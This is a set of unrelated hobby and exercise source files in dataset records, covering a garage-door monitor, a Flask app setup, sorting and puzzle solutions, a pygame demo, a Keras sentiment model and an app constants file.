distance_sensor.blink_led()\n\n # If the door is open, calculate how long it's been open, and periodically\n # send slack messages warning that the door has been opened for a prolonged\n # period of time.\n\n if door_status == DOOR_OPEN:\n elapsed_open_time_mins = (time.time() - opened_time) / 60.0\n door_log.information(\"{:,} Open door elapsed time is {:06.2f} minutes\".format(iteration, elapsed_open_time_mins))\n elapsed_open_time_mins = int(elapsed_open_time_mins)\n #### print(\"elapsed_open_time_mins {} last_warning {}\".format(elapsed_open_time_mins, last_warning))\n\n # Send the lack message if the door has been opened for a multiple of\n # 'warning_threshold' minutes.\n\n if ((elapsed_open_time_mins > 0 ) and\n (elapsed_open_time_mins % warning_threshold) == 0):\n #### print(\"elapsed_open_time {} warning_threshold {}\".format(elapsed_open_time_mins, warning_threshold))\n\n # Make sure only one message is sent per 'warning_threshold' multiple.\n if elapsed_open_time_mins != last_warning:\n open_warning_message = DOOR_OPEN_WARNING_MESSAGE.format(elapsed_open_time_mins)\n door_log.warning(open_warning_message)\n slack_iot.post_message(open_warning_message)\n last_warning = elapsed_open_time_mins\n\n # Sleep until time to take the next set of measurements.\n door_log.debug(\"{:,} Sleeping for {} seconds\".format(iteration, time_between_avg_measurements))\n time.sleep(time_between_avg_measurements)\n door_log.debug(\"{:,} Awoken from sleep\".format(iteration))\n\n\n#\n# This is the main processing where the command line arguments are\n# parsed and the monitoring function is called.\n#\n\ndef main():\n\n program_name = os.path.basename(__file__)\n door_log = journal.Journal(GDOOR_ACTIVITY_LOGGER,\n GDOOR_ACTIVITY_LOG_FILE,\n program_name)\n\n startup_log = journal.Journal(GDOOR_STARTUP_LOGGER,\n GDOOR_STARTUP_LOG_FILE,\n program_name)\n\n startup_log.information(\"Garage door monitor started.\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--checkstatus\",\n type=float,\n default=1.0,\n help=\"delay in minutes between checking door status\",\n )\n parser.add_argument(\"-i\",\n \"--individual\",\n type=float,\n default=0.5,\n help=\"delay in seconds between taking individual measurements\",\n )\n parser.add_argument(\"-m\",\n \"--measurements\",\n type=int,\n default=3,\n help=\"number of measurements for averaging\",\n )\n parser.add_argument(\"-o\",\n \"--open\",\n type=int,\n default=50,\n help=\"number of cm above the door is considered open\",\n )\n parser.add_argument(\"-w\",\n \"--warning\",\n type=int,\n default=30,\n help=\"display warnings when the door is open more than this many minutes\",\n )\n parser.add_argument(\"-d\",\n \"--debug\",\n action='store_true',\n help=\"print and log debugging messages\",\n )\n\n args = parser.parse_args()\n\n msg = \"Each average will use {} measurements.\".format(args.measurements)\n door_log.information(msg)\n\n msg = \"There will be {} seconds delay between individual measurements.\".format(args.individual)\n door_log.information(msg)\n\n msg = \"There will be {} minutes ({} seconds) delay between checking the door's status.\".format(args.checkstatus, args.checkstatus*60)\n door_log.information(msg)\n\n msg = \"Door is considered open if sensor reading is less than {}\".format(args.open)\n door_log.information(msg)\n\n msg = \"Warnings will be sent every {} minutes while the door is open\".format(args.warning)\n door_log.information(msg)\n\n # Set whether debug messages are printed and logged based on \n # what was specified on the command.\n door_log.log_debug = args.debug\n\n # Convert the time between taking averaged measurements from\n # minutes to seconds.\n checkstatus = 60 * args.checkstatus\n\n monitor_door(GPIO_TRIGGER,\n GPIO_ECHO,\n GPIO_STATUS_LED,\n args.measurements,\n args.individual,\n checkstatus,\n args.open,\n args.warning,\n door_log,\n )\n\n door_log.debug(\"Exiting...\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"garage-monitor.py","file_name":"garage-monitor.py","file_ext":"py","file_size_in_byte":14153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"120491191","text":"import json\nfrom logging.config import dictConfig as loadLogginConfig\nfrom pydantic import ValidationError\nfrom email_validator import EmailNotValidError\nfrom flask import Flask\nfrom flask_cors import CORS\n#\nfrom social_network.errors import ApplicationError\nfrom social_network.database import Database\nfrom social_network.settings import Config\n\n\n__all__ = [\"create_application\"]\n\n\ndb = Database()\n\n\ndef create_application():\n app = Flask(\"social_network\")\n app.config.from_object(Config)\n\n CORS(app)\n db.init_app(app)\n\n setup_logging(app)\n register_error_handlers(app)\n register_blueprints(app)\n\n return app\n\n\ndef setup_logging(app):\n with open(app.config[\"LOGGING_SETTINGS\"], \"r\") as f:\n loadLogginConfig(json.load(f))\n\n\ndef register_blueprints(app):\n from social_network.blueprints import auth_blueprint\n from social_network.blueprints import posts_blueprint\n from social_network.blueprints import users_blueprint\n from social_network.blueprints import analytics_blueprint\n\n app.register_blueprint(auth_blueprint)\n app.register_blueprint(posts_blueprint)\n app.register_blueprint(users_blueprint)\n app.register_blueprint(analytics_blueprint)\n\n\ndef register_error_handlers(app):\n\n def _handle_error(error):\n reason_tmp = getattr(error, \"description\", \"Internal error\")\n code_tmp = getattr(error, \"code\", 500)\n details_tmp = getattr(error, \"details\", [])\n\n reason = reason_tmp if isinstance(reason_tmp, str) else \"Internal error\"\n code = int(code_tmp) if isinstance(code_tmp, int) else 500\n details = details_tmp if isinstance(details_tmp, (list, tuple)) else []\n\n return {\n \"status\": \"error\",\n \"reason\": reason,\n \"details\": details\n }, code\n\n def default_handler(error):\n app.logger.exception(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n\n\n def application_error_handler(error):\n app.logger.error(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n \n def validation_error_handler(error):\n app.logger.info(f\"Invalid input:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Incorrec input\",\n \"details\": error.errors()\n }, 400\n\n def unvalid_email_error_handler(error):\n app.logger.info(f\"Invalid Email:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Email is not valid\",\n \"details\": []\n }, 400\n \n app.register_error_handler(Exception, default_handler)\n app.register_error_handler(ValidationError, validation_error_handler)\n app.register_error_handler(ApplicationError, application_error_handler)\n app.register_error_handler(EmailNotValidError, unvalid_email_error_handler)\n","sub_path":"src/social_network/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"446459039","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 11:07:36 2018\n\n@author: ENFIUEMS02\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\n\n#CRIANDO UM GRAFO DO TIPO GRID 2D\n\nN = 2\n\nG=nx.grid_2d_graph(N,N) #4x4 grid\n\nfor i in range(N):\n for j in range(N):\n G.nodes[(i,j)]['position']=[i,j]\n\npos=nx.get_node_attributes(G,'position')\n\nnx.draw(G, pos, with_labels=True)\n#plt.gca().invert_xaxis\n#plt.gca().invert_yaxis\nplt.axis('on')\nplt.show()\n\nprint(nx.info(G))\n\nprint(\"Vértices:\")\n\nfor i in G.nodes():\n print(i, \"position= \", G.node(data='position')[i])\n","sub_path":"paper_netx_texture_v4.py","file_name":"paper_netx_texture_v4.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"620911124","text":"def insertionsort(a):\r\n for i in range(len(a)):\r\n temp = a[i]\r\n k = i\r\n while k > 0 and temp < a[k - 1]:\r\n a[k] = a[k - 1]\r\n k -= 1\r\n a[k] = temp\r\n\r\ndef bucketsort(a):\r\n b=[]\r\n n=len(a)\r\n for i in range(1,11):\r\n l=[]\r\n b.append(l)\r\n x=max(a)\r\n d=0.1\r\n\r\n while x>0:\r\n x=int(x/10)\r\n d=d*10\r\n \r\n for i in range(n):\r\n j=int(a[i]/d)\r\n print(j)\r\n b[j].append(a[i])\r\n\r\n for i in range(1,11):\r\n try:\r\n insertionsort(b[i])\r\n except:\r\n pass\r\n l=[] \r\n for i in b :\r\n for j in i :\r\n l.append(j)\r\n print(l)\r\n \r\ns = input(\"Enter the numbers\")\r\na=list(map(int, s.split()))\r\nbucketsort(a)\r\n","sub_path":"Sorting/bucketsort.py","file_name":"bucketsort.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"523444740","text":"nn = input().split()\nn = int(nn[0])\nl = int(nn[1])\nr = int(nn[2])\n#s = [n]\n'''\nwhile True:\n\tla = True\n\tfor i in range(len(s)):\n\n\t\tif s[i] > 1:\n\t\t\ts = s[:i]+[int(s[i]/2),s[i]%2, int(s[i]/2)]+s[i+1:]\n\t\t\tla = False\n\tif la:\n\t\tbreak\n\ndef f(w):\n\tif w == 1:\n\t\treturn [1]\n\tif w == 0:\n\t\treturn[0]\n\ta = f(int(w/2))\n\treturn a + [w%2] + a\n'''\nlis = []\nwhile n > 1:\n\tif n%2:\n\t\tlis.append(1)\n\telse:\n\t\tlis.append(0)\n\tn = int(n/2)\n\tprint(n)\nlis = lis[::-1]\nllis = len(lis)\ncount = 0\nprint(lis)\nprint(llis)\nfor i in range(l,r+1):\n\tif i % 2:\n\t\t#print(i)\n\t\tcount += 1\n\telse:\n\t\tfor j in range(llis):\n\t\t\tif i - 2**(j +1) <0:\n\t\t\t\t#print(i - 2**(j +1))\n\t\t\t\tbreak\n\t\t\tif (i-2**(j +1))%(2**(j+2)) == 0:\n\t\t\t\t#print(2**(j +1))\n\t\t\t\tcount += lis[j]\n\n\nprint(count)","sub_path":"Codeforces/399d2B.py","file_name":"399d2B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"389514879","text":"\"\"\"\r\nDesafio089 - Crie um programa que leia nome e duas notas de varios alunos\r\ne guarde tudo em uma lista composta. No final mostre um boletim contendo a media\r\nde cada um e permita que o usuario possa mostrar as notas de cada aluno individualmente\r\n\"\"\"\r\nalunos = []\r\nwhile True:\r\n nome = input('Nome: ')\r\n n1 = float(input('Nota 1: '))\r\n n2 = float(input('Nota 2: '))\r\n media = (n1 + n2) / 2 \r\n alunos.append( [nome, [n1, n2], media] )\r\n sair = input('Deseja sair? [S/N] ')\r\n if sair in 'sS':\r\n break\r\n\r\nprint('-='*30)\r\n\r\nprint(f'{\"Nº \":<2}{\"NOME\":<10}{\"MÉDIA\":>8}')\r\nprint('-'*30)\r\n\r\nfor i,a in enumerate(alunos):\r\n\tprint('{:<4}{:<10}{:>8.1f}'.format(i,a[0],a[2]))\r\n\r\nprint('-'*30)\r\nwhile True:\r\n try:\r\n op = int(input('Mostrar notas de qual aluno acima?\\nDigite o número ou 999 para sair: '))\r\n if op == 999:\r\n print('Saindo...')\r\n break\r\n elif op <= len(alunos):\r\n print('-'*30)\r\n print('Notas de {} são {}'.format(alunos[op][0], alunos[op][1]))\r\n print('-'*30)\r\n except IndexError:\r\n print('Não há nenhum aluno com este número!')\r\n print('-'*30)","sub_path":"Desafio089.py","file_name":"Desafio089.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"488430098","text":"#!/usr/bin/python3.4\n\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\n#Ouverture de la fenêtre Pygame\nfenetre = pygame.display.set_mode((640, 480))\n\n#Chargement et collage du fond\nfond = pygame.image.load(\"background.jpg\").convert()\nfenetre.blit(fond, (0,0))\n\n#Chargement et collage du personnage\nperso = pygame.image.load(\"perso.png\").convert_alpha()\nposition_perso = perso.get_rect()\nfenetre.blit(perso, (200,300))\n\n#Rafraîchissement de l'écran\npygame.display.flip()\n\n#Variable qui continue la boucle si = 1, stoppe si = 0\ncontinuer = 1\n\n\npygame.key.set_repeat(400, 30)\n#Boucle infinie\nwhile continuer:\n for event in pygame.event.get(): #On parcours la liste de tous les événements reçus\n if event.type == QUIT: #Si un de ces événements est de type QUIT\n continuer = 0 #On arrête la boucle\n continuer = 0\n if event.type == KEYDOWN:\n if event.key == K_DOWN: #Si \"flèche bas\"\n #On descend le perso\n position_perso = position_perso.move(0,3)\n \n #Re-collage\n fenetre.blit(fond, (0,0)) \n fenetre.blit(perso, position_perso)\n #Rafraichissement\n pygame.display.flip()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612369520","text":"import numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import Conv1D, MaxPooling1D\nfrom keras_preprocessing.text import Tokenizer\n\nfrom datasets import sentiment_140\nfrom utils.data_utils import export\nfrom w2v import google_news_vectors_negative300\n\n# Embedding\nmaxlen = 100\nmax_features = 20000\n\n# Convolution\nkernel_size = 5\nfilters = 64\npool_size = 4\n\n# LSTM\nlstm_output_size = 70\n\n# Training\nbatch_size = 2048\nepochs = 7\n\nprint('Loading data...')\n(x_train, y_train), (x_val, y_val), (x_test, y_test) = sentiment_140.load_data()\n\nprint('Fitting tokenizer...')\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(np.concatenate((x_train, x_val, x_test)))\n\nprint('Convert text to sequences')\nx_train = tokenizer.texts_to_sequences(x_train)\nx_val = tokenizer.texts_to_sequences(x_val)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nprint(len(x_train), 'train sequences')\nprint(len(x_val), 'validation sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\n\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_val = sequence.pad_sequences(x_val, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n\nprint('x_train shape:', x_train.shape)\nprint('x_val shape:', x_val.shape)\nprint('x_test shape:', x_test.shape)\n\nprint('Loading w2v...')\nword2vec = google_news_vectors_negative300.load_w2v()\n\nprint('Preparing embedding matrix')\nword_index = tokenizer.word_index\nnb_words = len(word_index)+1\nprint(nb_words)\nembedding_matrix = np.zeros((nb_words, 300))\nfor word, i in word_index.items():\n if word in word2vec.vocab:\n embedding_matrix[i] = word2vec.word_vec(word)\nprint('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\nmodel.add(Dropout(0.25))\nmodel.add(Conv1D(filters,\n kernel_size,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=pool_size))\nmodel.add(LSTM(lstm_output_size))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\nprint('Train...')\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val))\nscore, acc = model.evaluate(x_test, y_test, batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n\nexport(model, history, tokenizer, name=\"sentiment_140_cnn_lstm\", score=score, acc=acc)\n","sub_path":"models/cnn_lstm/sentiment_140_cnn_lstm.py","file_name":"sentiment_140_cnn_lstm.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"200062088","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\nbd_dictionary = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h'\n}\n\n\nused = set()\n\n\ndef get_pos(row, col):\n return bd_dictionary[row] + str(col)\n\n\ndef gen_Legal_Moves(x, y):\n newMoves = []\n moveOffsets = [(-1, 2), (1, 2), (2, 1), (2, -1), (1, -2),\n (-1, -2), (-2, -1), (-2, 1)]\n for i in moveOffsets:\n newX = x + i[0]\n newY = y + i[1]\n if legal_Coord(newX) and legal_Coord(newY):\n newMoves.append((newX, newY))\n return newMoves\n\n\ndef legal_Coord(x):\n if x >= 1 and x <= 8:\n return True\n else:\n return False\n\n\ndef create_Graph():\n horse_Graph = dict()\n for row in range(1, 9, 1):\n for col in range(1, 9, 1):\n node_Id = get_pos(row, col)\n new_Positions = gen_Legal_Moves(row, col)\n temp = []\n for e in new_Positions:\n n_id = get_pos(e[0], e[1])\n temp.append(n_id)\n horse_Graph.update({node_Id: temp})\n return horse_Graph\n\n\ndef DFS(graph, current, end, fr):\n used.add(current)\n previous[current] = fr\n for node in graph[current]:\n if node not in used:\n if node == end:\n previous[end] = current\n break\n DFS(graph, node, end, current)\n\nif __name__ == \"__main__\":\n global previous\n previous = dict()\n graph = create_Graph()\n with open('in.txt', 'r') as inp:\n data = inp.read().split('\\n')\n start = data[0]\n end = data[1]\n DFS(graph, start, end, start)\n res = []\n now = end\n while now != start:\n res.append(now)\n now = previous[now]\n res.append(start)\n res.reverse()\n with open('out.txt', 'w') as out:\n counter = 1\n for step in res:\n if counter != len(res):\n out.write(step + '\\n')\n counter += 1\n else:\n out.write(step)\n","sub_path":"1-й семестр/problem_two/main_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"638674379","text":"'''\n\n637. Average of Levels in Binary Tree\n\nGiven a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n\nExample 1:\n\nInput:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: [3, 14.5, 11]\n\nExplanation:\n\nThe average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. \n\nHence return [3, 14.5, 11].\n\nNote:\n\nThe range of node's value is in the range of 32-bit signed integer.\n\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\nclass Solution(object):\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n queue = deque()\n result = []\n queue.append(root)\n while queue:\n size = len(queue)\n sum = 0.0\n for index in xrange(size):\n cur = queue.popleft()\n sum += cur.val\n if cur.left:\n queue.append(cur.left)\n if cur.right:\n queue.append(cur.right)\n result.append(sum / size)\n return result\n","sub_path":"637.AverageofLevelsinBinaryTree.py","file_name":"637.AverageofLevelsinBinaryTree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"220581368","text":"# -*- coding: utf-8 -*-\n# \n# # MIT License\n# \n# Copyright (c) 2019 Mike Simms\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"Key strings for all key/value pairs used in the app\"\"\"\n\n# Keys associated with user management.\nSESSION_KEY = '_straen_username'\nDATABASE_ID_KEY = \"_id\"\nUSERNAME_KEY = \"username\" # Login name for a user\nPASSWORD_KEY = \"password\" # User's password\nPASSWORD1_KEY = \"password1\" # User's password when creating an account\nPASSWORD2_KEY = \"password2\" # User's confirmation password when creating an account\nDEVICE_KEY = \"device\" # Unique identifier for the device which is recording the activity\nDEVICES_KEY = \"devices\" # List of device identifiers\nREALNAME_KEY = \"realname\" # User's real name\nHASH_KEY = \"hash\" # Password hash\nFRIEND_REQUESTS_KEY = \"friend_requests\"\nFRIENDS_KEY = \"friends\"\nREQUESTING_USER_KEY = \"requesting_user\"\nPR_KEY = \"pr\" # Personal record\nEMAIL_KEY = \"email\" # User's email\nTARGET_EMAIL_KEY = \"target_email\" # Email address of another user\n\n# User settings\nDEFAULT_PRIVACY = \"default privacy\"\nPREFERRED_UNITS_KEY = \"preferred units\"\nUNITS_METRIC_KEY = \"metric\"\nUNITS_STANDARD_KEY = \"standard\"\nBIRTHDAY_KEY = \"birthday\"\nDEFAULT_BIRTHDAY = \"315532800\"\nHEIGHT_KEY = \"height\"\nDEFAULT_HEIGHT = \"1.8\"\nWEIGHT_KEY = \"weight\" # User's weight (kilograms)\nDEFAULT_WEIGHT = \"70\"\nGENDER_KEY = \"gender\"\nGENDER_MALE_KEY = \"male\"\nGENDER_FEMALE_KEY = \"female\"\nRESTING_HEART_RATE_KEY = \"resting heart rate\"\nESTIMATED_MAX_HEART_RATE_KEY = \"estimated max heart rate\"\nESTIMATED_FTP_KEY = \"estimated ftp\"\nPREFERRED_LONG_RUN_DAY_KEY = \"preferred long run day\" # Day of the week on which the user prefers to do their long runs\nGOAL_TYPE_KEY = \"goal type\" # Extra info about the user's goal, such as whether they care about speed or just finishing a race\nGOAL_TYPE_COMPLETION = \"Completion\"\nGOAL_TYPE_SPEED = \"Speed\"\n\n# Personal records\nRECORDS_USER_ID = \"user_id\"\nRECORD_NAME = \"record_name\"\nPERSONAL_RECORDS = \"records\"\n\n# Workout plans\nWORKOUT_PLAN_USER_ID_KEY = \"user_id\"\nWORKOUT_PLAN_CALENDAR_ID_KEY = \"calendar id\"\nWORKOUT_LIST_KEY = \"workouts\"\nWORKOUT_ID_KEY = \"workout_id\"\nWORKOUT_TYPE_KEY = \"type\"\nWORKOUT_DESCRIPTION_KEY = \"description\"\nWORKOUT_SPORT_TYPE_KEY = \"sport type\"\nWORKOUT_WARMUP_KEY = \"warmup\"\nWORKOUT_INTERVALS_KEY = \"intervals\"\nWORKOUT_COOLDOWN_KEY = \"cooldown\"\nWORKOUT_SCHEDULED_TIME_KEY = \"scheduled time\"\n\n# Workout types\nWORKOUT_TYPE_REST = \"Rest\"\nWORKOUT_TYPE_EVENT = \"Event\"\nWORKOUT_TYPE_SPEED_RUN = \"Speed Run\"\nWORKOUT_TYPE_INTERVAL_SESSION = \"Interval Session\"\nWORKOUT_TYPE_TEMPO_RUN = \"Tempo Run\"\nWORKOUT_TYPE_EASY_RUN = \"Easy Run\"\nWORKOUT_TYPE_HILL_REPEATS = \"Hill Repeats\" # 4-10 repeats, depending on skill level, done at 5K pace\nWORKOUT_TYPE_MIDDLE_DISTANCE_RUN = \"Middle Distance Run\" # 2 hour run for advanced distance runners\nWORKOUT_TYPE_LONG_RUN = \"Long Run\"\nWORKOUT_TYPE_OPEN_WATER_SWIM = \"Open Water Swim\"\nWORKOUT_TYPE_POOL_WATER_SWIM = \"Pool Swim\"\n\n# Keys associated with uploading data\nUPLOADED_FILE_NAME_KEY = \"uploaded_file_name\"\nUPLOADED_FILE_DATA_KEY = \"uploaded_file_data\"\n\n# Keys inherited from the mobile app. Some of these are also used by the web app.\nAPP_NAME_KEY = \"Name\"\nAPP_TIME_KEY = \"Time\"\nAPP_USERNAME_KEY = \"User Name\"\nAPP_DEVICE_ID_KEY = \"DeviceId\"\nAPP_ID_KEY = \"ActivityId\"\nAPP_TYPE_KEY = \"ActivityType\"\nAPP_DISTANCE_KEY = \"Distance\"\nAPP_DURATION_KEY = \"Duration\"\nAPP_CADENCE_KEY = \"Cadence\" # Raw cadence list.\nAPP_TEMP_KEY = \"Temperature\"\nAPP_CURRENT_SPEED_KEY = \"Current Speed\"\nAPP_AVG_SPEED_KEY = \"Avgerage Speed\"\nAPP_MOVING_SPEED_KEY = \"Moving Speed\" \nAPP_SPEED_VARIANCE_KEY = \"Speed Variance\"\nAPP_HEART_RATE_KEY = \"Heart Rate\" # Raw heart rate list.\nAPP_AVG_HEART_RATE_KEY = \"Average Heart Rate\" # Computed average heart rate.\nAPP_CURRENT_PACE_KEY = \"Current Pace\" # Computed pace list.\nAPP_POWER_KEY = \"Power\" # Raw power data list.\nAPP_SETS_KEY = \"Sets\"\nAPP_DISTANCES_KEY = \"distances\" # Distance between data points.\nAPP_LOCATIONS_KEY = \"locations\" # Raw position data.\nAPP_LOCATION_LAT_KEY = \"Latitude\"\nAPP_LOCATION_LON_KEY = \"Longitude\"\nAPP_LOCATION_ALT_KEY = \"Altitude\"\nAPP_ACCELEROMETER_KEY = \"accelerometer\" # Raw accelerometer list.\nAPP_AXIS_NAME_X = \"x\"\nAPP_AXIS_NAME_Y = \"y\"\nAPP_AXIS_NAME_Z = \"z\"\n\nLOCATION_LAT_KEY = \"latitude\"\nLOCATION_LON_KEY = \"longitude\"\nLOCATION_ALT_KEY = \"altitude\"\nLOCATION_TIME_KEY = \"time\"\n\nACCELEROMETER_AXIS_NAME_X = \"x\"\nACCELEROMETER_AXIS_NAME_Y = \"y\"\nACCELEROMETER_AXIS_NAME_Z = \"z\"\nACCELEROMETER_TIME_KEY = \"time\"\n\n# Keys used exclusively by the web app.\nACTIVITY_ID_KEY = \"activity_id\" # Unique identifier for the activity\nACTIVITY_HASH_KEY = \"activity_hash\"\nACTIVITY_TYPE_KEY = \"activity_type\"\nACTIVITY_DESCRIPTION_KEY = \"description\"\nACTIVITY_USER_ID_KEY = \"user_id\"\nACTIVITY_DEVICE_STR_KEY = \"device_str\"\nACTIVITY_LOCATIONS_KEY = \"locations\"\nACTIVITY_NAME_KEY = \"name\"\nACTIVITY_TIME_KEY = \"time\"\nACTIVITY_END_TIME_KEY = \"end_time\"\nACTIVITY_VISIBILITY_KEY = \"visibility\"\nACTIVITY_VISIBILITY_PUBLIC = \"public\"\nACTIVITY_VISIBILITY_PRIVATE = \"private\"\nACTIVITY_COMMENT_KEY = \"comment\"\nACTIVITY_COMMENTS_KEY = \"comments\"\nACTIVITY_COMMENTER_ID_KEY = \"commenter_id\" # User ID of the user leaving the comment on an activity\nACTIVITY_TAG_KEY = \"tag\"\nACTIVITY_TAGS_KEY = \"tags\"\nACTIVITY_SUMMARY_KEY = \"summary_data\"\nACTIVITY_EXPORT_FORMAT_KEY = \"export_format\"\nACTIVITY_NUM_POINTS = \"num_points\" \nACTIVITY_LOCATION_DESCRIPTION_KEY = \"location_description\" # Political description of the activity location (i.e., Florida)\nACTIVITY_INTERVALS = \"intervals\" # Intervals that were computed from the workout\n\n# Keys used to summarize activity data.\nBEST_SPEED = \"Best Speed\"\nBEST_PACE = \"Best Pace\"\nBEST_1K = \"Best 1K\"\nBEST_MILE = \"Best Mile\"\nBEST_5K = \"Best 5K\"\nBEST_10K = \"Best 10K\"\nBEST_15K = \"Best 15K\"\nBEST_HALF_MARATHON = \"Best Half Marathon\"\nBEST_MARATHON = \"Best Marathon\"\nBEST_METRIC_CENTURY = \"Best Metric Century\"\nBEST_CENTURY = \"Best Century\"\nBEST_5_SEC_POWER = \"5 Second Power\"\nBEST_12_MIN_POWER = \"12 Minute Power\"\nBEST_20_MIN_POWER = \"20 Minute Power\"\nBEST_1_HOUR_POWER = \"1 Hour Power\"\nMAX_POWER = \"Maximum Power\"\nMAX_HEART_RATE = \"Maximum Heart Rate\"\nMAX_CADENCE = \"Maximum Cadence\"\nAVG_PACE = \"Average Pace\"\nAVG_POWER = \"Average Power\"\nAVG_HEART_RATE = \"Average Heart Rate\"\nAVG_CADENCE = \"Average Cadence\"\nNORMALIZED_POWER = \"Normalized Power\"\nTHRESHOLD_POWER = \"Threshold Power\"\nINTENSITY_FACTOR = \"Intensity Factor\"\nTSS = \"TSS\" # Training Stress Score\nRTSS = \"rTSS\" # Run Training Stress Score\nVARIABILITY_INDEX = \"Variability Index\"\nCLUSTER = \"Cluster\"\nTOTAL_DISTANCE = \"Total Distance\"\nLONGEST_DISTANCE = \"Longest Distance\"\nMILE_SPLITS = \"Mile Splits\"\nKM_SPLITS = \"KM Splits\"\n\n# API-only keys.\nSECONDS = \"seconds\"\nDEVICE_LAST_HEARD_FROM = \"last_heard_from\"\n\n# Running paces.\nLONG_RUN_PACE = \"Long Run Pace\"\nEASY_RUN_PACE = \"Easy Run Pace\"\nTEMPO_RUN_PACE = \"Tempo Run Pace\"\nSPEED_RUN_PACE = \"Speed Run Pace\"\n\n# Keys used to manage gear.\nGEAR_KEY = \"gear\"\nGEAR_ID_KEY = \"gear_id\"\nGEAR_TYPE_KEY = \"type\"\nGEAR_NAME_KEY = \"name\"\nGEAR_DESCRIPTION_KEY = \"description\"\nGEAR_ADD_TIME_KEY = \"add_time\"\nGEAR_RETIRE_TIME_KEY = \"retire_time\"\nGEAR_INITIAL_DISTANCE_KEY = \"initial_distance\"\nGEAR_TYPE_BIKE = \"bike\"\nGEAR_TYPE_SHOES = \"shoes\"\nGEAR_SERVICE_HISTORY = \"service_history\"\n\n# Service record keys.\nSERVICE_RECORD_ID_KEY = \"service_id\"\nSERVICE_RECORD_DATE_KEY = \"date\"\nSERVICE_RECORD_DESCRIPTION_KEY = \"description\"\n\n# Activity types\nTYPE_UNSPECIFIED_ACTIVITY = \"Unknown\"\nTYPE_RUNNING_KEY = 